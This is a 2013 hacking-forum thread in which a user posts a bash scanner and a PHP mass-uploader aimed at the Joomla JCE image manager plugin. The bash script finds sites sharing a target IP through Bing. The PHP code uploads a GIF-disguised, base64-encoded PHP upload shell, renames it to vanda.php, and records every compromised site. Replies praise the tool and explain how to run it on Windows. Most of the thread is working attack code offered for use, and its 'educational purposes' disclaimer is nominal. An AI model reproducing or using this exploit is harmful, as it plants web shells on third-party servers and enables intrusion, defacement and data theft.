Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Server Jce Scanner && Exploiter

  • 0 Vote(s) - 0 Average


08-27-2013, 10:26 PM #1
Beni_Vanda Offline Respected *****
Respected
Posts:21 Threads:5 Joined:Jun 2013 Reputation: 0
Mood: None
[Image: 137760525219334_jce-exploiter.png]

D3m00 : http://www.mediafire.com/download/slq8r7...51/jce.mp4



insert jce.php beside bash script :


bash script :

PHP Code:
#!/bin/bash
# Jce Server Scanner && Exploiter
# Coded By : Red V!per  
# http://redhat-viper.blogspot.com
# Report Bugs : [email protected]
# D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4
# Gr33tz   : All Turkish && Persian Hacker
#--------------------------------------------------------------------------------------------------------------------
#
# Tnx 2 : IrIsT.Ir && turk-bh.ir && ibh.ir && 3xp1r3.com && madleets.com 
# devil-zone.net && kurdhackteam.com && www.turkhackteam.net && thecrowscrew.org
#


#-------------------- Red V!per Banner ----------------------------------------------------------------------------
Banner()
{
clear 
echo -'\E[34m'" ||______________________________________________________|| "tput sgr0
echo -'\E[34m'" ||------------------------------------------------------|| "tput sgr0
echo -'\E[34m'" ||------------------------------------------------------|| "tput sgr0
echo -'\E[34m'" ||                                                      || "tput sgr0
echo -'\E[34m'" ||\E[31m  _____          _  __      ___                       \E[34m|| "tput sgr0 
echo -'\E[34m'" ||\E[31m |  __ \        | | \ \    / / |                      \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[31m | |__) |___  __| |  \ \  / /| |_ __   ___ _ __       \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[31m |  _  // _ \/ _\ |   \ \/ / | | '_ \ / _ \ '__|      \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[31m | | \ \  __/ (_| |    \  /  |_| |_) |  __/ |         \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[31m |_|  \_\___|\__,_|     \/   (_) .__/ \___|_|         \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[31m                               | |                    \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[31m                               |_|                    \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[32m   _                                                  \E[34m|| "tput sgr0     
echo -'\E[34m'" ||\E[32m  (_)                                                 \E[34m|| "tput sgr0  
echo -'\E[34m'" ||\E[32m   _  ___ ___   ___  ___ __ _ _ __  _ __   ___ _ __   \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[32m  | |/ __/ _ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__|  \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[32m  | | (_|  __/ \__ \ (_| (_| | | | | | | |  __/ |     \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[32m  | |\___\___| |___/\___\__,_|_| |_|_| |_|\___|_|     \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[32m _/ |                                                 \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[32m|__/                                                  \E[34m|| "tput sgr0
echo -'\E[34m'" ||------------------------------------------------------|| "tput sgr0
echo -'\E[34m'" ||------------------------------------------------------|| "tput sgr0
echo -'\E[34m'" ||______________________________________________________|| "tput sgr0
sleep 3
echo
echo -
"$B /\ (^_^) /\ [public] \n"
echo -" -===============================================-\n"
echo -"   Server Jce Scanner && Exploiter"
echo  
echo -
"   BY : Red V!per\n"
echo -" -===============================================-"
echo
echo
echo -
" -========== [         INFO         ] ===========-"
echo
read -"[*] Target Ip : " IP
echo -"$N"
}

#-------------------- Variables ----------------------------------------------------------------------------

B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"

#-------------------- Scanning Jce Targets on Server  -------------------------------------------------------

scan_jce_on_victim()
{
page=0  
how_many
=1  
single_page
=  
last_page_check=
image_manager="index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"

 
while [ -"$last_page_check] && [ -"$how_many] && [ -"$single_page]; do  
  
url="http://www.bing.com/search?q=ip:$IP+'index.php?option=com_'&qs=n&pq=ip:$IP+'index.php?option=com_'&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"  
  
 
wget --O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5" "$url"  
  
 
last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`  
    
 
how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`  
  
 
single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `  
  
  
  
cat domain_bing.php egrep -"<h3><a href=\"[^\"]+" domain_bing.php cut -'"' -f 2 >> alldomain_bing.txt  
  rm 
-f domain_bing.php  
  let page
=$page+1   
  done  
  
cat alldomain_bing
.txt grep "com_" tr '[:upper:]' '[:lower:]' awk '{gsub("http://","")}1' awk '{gsub("https://","")}1' sed '/www./s///g' cut -'?' -f 1 awk '{gsub("/index.php","")}1' sort uniq >> domains.txt
  
for domain in `cat domains.txt`  
   do  
     
GET -sd "http://www.$domain/$image_managergrep "OK" >> /dev/null;check=$?
      if [ 
$check -eq 0 ]
         
then
           
echo "www.$domainsite.lst
           php jce
.php site.lst shells.lst
        GET 
-"http://www.$domain/images/stories/vanda.php" grep "GIF89a1" >> /dev/null;check2=$?
        if [ 
$check2 -eq 0 ]
        
then
        
echo -"$B[+] www.$domain \e[1;32m[Trying to upload shell] \e[0m"
        
echo -"$B[+] Shell : www.$domain/images/stories/vanda.php \e[1;31m[OK] \e[0m"
        
echo "www.$domain/images/stories/vanda.php" >> vanda_shells.lst
        
else
        echo 
"[-] www.$domain/ [No] "
        
fi    
       
else
         echo 
"[-] www.$domain/ [No] "
      
fi    
   done  
rm 
-rf alldomain_bing.txt 
rm 
-rf domains.txt 
rm 
-rf site.lst 
rm 
-rf shells.lst
}

#-------------------- Remove  ------------------------------------------------------------------------
all_remove()
{
 
rm -rf alldomain_bing*
 
rm -rf domains_f*
 
rm -rf domains_f*
 
rm -rf domain_bing*  
 
rm -rf alldomain_bing*
 
rm -rf domains*
 
rm -rf jce_server*
 
rm -rf site*
}

#-------------------- Main Brain :D  ------------------------------------------------------------------------
main()
{
chmod +x jce.php 

if [ ! -f shells.lst ]; then
    touch shells
.lst ;
fi

Banner
;
all_remove;
scan_jce_on_victim;
}

main

jce.php :

PHP Code:
<?php

/*
# Mass Uploader   
# Coded By Mua & Keresteci
# Recoded By Red V!per
*/

    
$kirilmis 0;

    
$taranmis 0;

    
error_reporting(0);

    
ini_set("max_execution_time"0);

    
ini_set("default_socket_timeout"3);

    function 
oku($link)

    {

        
$site         parse_url($link);

        
$link         $site["path"];

        
$site         $site["host"];

        
$httpresponse "";

        
$fp           fsockopen($site80$err_num$err_msg30);

        if (
$fp) {

            
fputs($fp"GET $link HTTP/1.0\r\nHost: $site\r\n\r\n");

            
fputs($fp"Connection: close\n\n");

            while (!
feof($fp)) {

                
$http_response .= fgets($fp128);

            }

            
fclose($fp);

        }

        return 
$http_response;

    }

    
$dosya      $argv[1];

    
$kirilanlar fopen($argv[2], 'w');

    
$okunan file($dosya);

    
$toplam count($okunan);

    foreach (
$okunan as $sira => $satir) {

        
$hatalisite 0;

        
$satir      preg_replace("/[\\n\\r]+/"""$satir);

        
$url        parse_url($satir);

        if (
$url["scheme"])

            
$host $url["host"];

        else {

            
$url  parse_url("http://" $satir);

            
$host $url["host"];

        }


        
$packet "Mua-Kontrol-Paketi-Panpa";


        
$fp fsockopen('tcp://' $host80$errno$errstr5);

        if (
$fp) {

            
fwrite($fp$packet);

            
fclose($fp);

        }

        
$content "GIF89a1\n";

        
$content .= '<?php eval("?>".base64_decode("PGh0bWw+IENvZGVkIEJ5IE11YSAmIEtlcmVzdGVjaTxicj4NCjw/IA0KLyogQ29kZWQgQnkgTXVhICYgS2VyZXN0ZWNpICovDQplY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOw0KZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7DQppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+dXN0YSB1cGxvYWQgYmFzYXJpbGk8L2I+PGJyPjxicj4nOyB9DQp9DQo/PjwvaHRtbD4=")); ?>';

        
$data "-----------------------------41184676334\r\n";

        
$data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";

        
$data .= "/\r\n";

        
$data .= "-----------------------------41184676334\r\n";

        
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";

        
$data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";

        
$data .= "-----------------------------41184676334\r\n";

        
$data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";

        
$data .= "0\r\n";

        
$data .= "-----------------------------41184676334\r\n";

        
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"mua.gif\"\r\n";

        
$data .= "Content-Type: image/gif\r\n\r\n";

        
$data .= "$content\r\n";

        
$data .= "-----------------------------41184676334\r\n";

        
$data .= "0day\r\n";

        
$data .= "-----------------------------41184676334\r\n";

        
$data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";

        
$data .= "upload\r\n";

        
$data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";

        
$packet "POST " $p "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";

        
$packet .= "Host: " $host "\r\n";

        
$packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";

        
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";

        
$packet .= "Accept-Language: en-us,en;q=0.5\r\n";

        
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";

        
$packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";

        
$packet .= "Connection: Close\r\n";

        
$packet .= "Proxy-Connection: close\r\n";

        
$packet .= "Content-Length: " strlen($data) . "\r\n\r\n\r\n\r\n";

        
$packet .= $data;


            
$fp fsockopen('tcp://' $host80$errno$errstr5);

            if (
$fp) {

                
fwrite($fp$packet);

                
fclose($fp);

            }


        
$packet "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";

        
$packet .= "Host: " $host "\r\n";

        
$packet .= "User-Agent: Mua \r\n";

        
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

        
$packet .= "Accept-Language: en-US,en;q=0.8\r\n";

        
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";

        
$packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";

        
$packet .= "Accept-Encoding: deflate\n";

        
$packet .= "X-Request: JSON\r\n";

        
$packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";

        
$ren "json={\"fn\":\"folderRename\",\"args\":[\"/mua.gif\",\"vanda.php\"]}";

        
$packet .= "Content-Length: " strlen($ren) . "\r\n\r\n";

        
$packet .= $ren "\r\n\r\n";

            
$fp fsockopen('tcp://' $host80$errno$errstr5);

            if (
$fp) {

                
fwrite($fp$packet);

                
fclose($fp);

            }

        
$taranmis $taranmis 1;

            
$kod      oku("http://" $host "/images/stories/vanda.php");

            
$pozisyon strpos($kod"GIF89a1");

            if (
$pozisyon == true) {

                
$kirilmis $kirilmis 1;

                
fwrite($kirilanlar"http://" $host "/images/stories/vanda.php\r\n");

            }
    } 
//for each


    
fclose($yaz);

    
fclose($kirilanlar); 

bash script : http://www.mediafire.com/download/2rk5ik...ploiter.sh

jce.php : http://www.mediafire.com/download/p8210a...9y/jce.php

08-27-2013, 10:34 PM #2
sniffer Offline Bug Researchers **********
Junior Administrator
Posts:878 Threads:126 Joined:Sep 2012 Reputation: 12
Mood: Happy
thanks a lot bro very good +rep

jabber : [email protected]

08-27-2013, 11:14 PM #3
canomer Offline Junior Member **
Registered
Posts:1 Threads:0 Joined:Aug 2013 Reputation: 0
Mood: None
Hello I can't use with backtrack 5 r3 Why ?

08-27-2013, 11:22 PM #4
Beni_Vanda Offline Respected *****
Respected
Posts:21 Threads:5 Joined:Jun 2013 Reputation: 0
Mood: None
hello bro Smiley1
u can use bash scripts in all linux's kernel
insert this scripts in same directory . and watch demoo video ...

08-28-2013, 12:57 AM #5
dabeeyow Offline Junior Member **
Registered
Posts:6 Threads:0 Joined:Jul 2013 Reputation: 0
Mood: None
How to run this on Windows? Thanks in advance.

08-28-2013, 01:48 AM #6
Beni_Vanda Offline Respected *****
Respected
Posts:21 Threads:5 Joined:Jun 2013 Reputation: 0
Mood: None
for better performance please use this script a unix/linux os ...

08-28-2013, 04:13 AM #7
sniffer Offline Bug Researchers **********
Junior Administrator
Posts:878 Threads:126 Joined:Sep 2012 Reputation: 12
Mood: Happy
if you need run this script in windows first you need install cygwin (http://www.cygwin.com/)

jabber : [email protected]

08-28-2013, 10:36 AM #8
dabeeyow Offline Junior Member **
Registered
Posts:6 Threads:0 Joined:Jul 2013 Reputation: 0
Mood: None
I already installed Cygwin. It's working great now. Thanks! Smiley1

08-28-2013, 01:30 PM #9
Diizzy Offline cat /etc/passwd ***
TeaM MaDLeeTs
Posts:146 Threads:5 Joined:Jul 2013 Reputation: 1
Mood: Say What
Nice Work Biggrinsmiley .... Thanks Bro wink

 
--------------------------------------
Facebook | Twitter

--------------------------------------

08-30-2013, 08:29 PM #10
nightmare Offline Banned
Posts:160 Threads:63 Joined:Jun 2013
Mood: None
nice one but i dont think there is more sites exploiteable now






Forum Jump:


Users browsing this thread:1 Guest(s)